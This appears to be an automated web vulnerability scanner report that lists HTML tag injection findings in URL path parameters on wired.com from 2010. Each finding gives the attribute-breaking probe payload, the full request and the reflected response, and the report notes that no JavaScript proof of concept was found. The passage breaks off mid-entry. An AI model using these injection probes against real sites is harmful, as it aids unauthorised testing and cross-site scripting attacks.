The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:08 GMT Date: Sun, 21 Nov 2010 23:09:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29399 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtecha6e54"><a>33024249170 ss_genetics"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29399 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:15 GMT Date: Sun, 21 Nov 2010 23:09:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medteche0876"><a>211d7d736ef/health HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29395 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:41 GMT Date: Sun, 21 Nov 2010 23:08:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medteche0876"><a>211d7d736ef ss_health"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29395 Vary: Accept-Encoding Cache-Control: max-age=549 Expires: Sun, 21 Nov 2010 23:18:22 GMT Date: Sun, 21 Nov 2010 23:09:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_healthed9f9"><a>5052cbc9d21"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:48 GMT Date: Sun, 21 Nov 2010 23:08:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:21 GMT Date: Sun, 21 Nov 2010 23:09:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29268 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:57 GMT Date: Mon, 22 Nov 2010 01:11:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimediaaf2cd"><a>0b4232b1240"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29269 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Sun, 21 Nov 2010 20:19:58 GMT Date: Sun, 21 Nov 2010 20:16:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_multimedia3e1b5"><a>d5da876dbe0"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:21:53 GMT Date: Mon, 22 Nov 2010 01:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 22 Nov 2010 01:22:18 GMT Date: Mon, 22 Nov 2010 01:12:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29299 Vary: Accept-Encoding Cache-Control: max-age=239 Expires: Mon, 22 Nov 2010 01:15:40 GMT Date: Mon, 22 Nov 2010 01:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politicsc427d"><a>e6d5b4a7516"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29300 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Sun, 21 Nov 2010 20:20:15 GMT Date: Sun, 21 Nov 2010 20:16:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics70abd"><a>9d24c849cc4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics209da"><a>9d347d00209/law HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:03 GMT Date: Sun, 21 Nov 2010 23:09:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics209da"><a>9d347d00209 ss_law"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:31 GMT Date: Sun, 21 Nov 2010 23:09:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29328 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:13:05 GMT Date: Sun, 21 Nov 2010 23:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29328 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:32 GMT Date: Sun, 21 Nov 2010 23:09:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /politics5482e"><a>d19474f130/security HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29318 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Sun, 21 Nov 2010 23:12:58 GMT Date: Sun, 21 Nov 2010 23:09:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_politics5482e"><a>d19474f130 ss_security"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
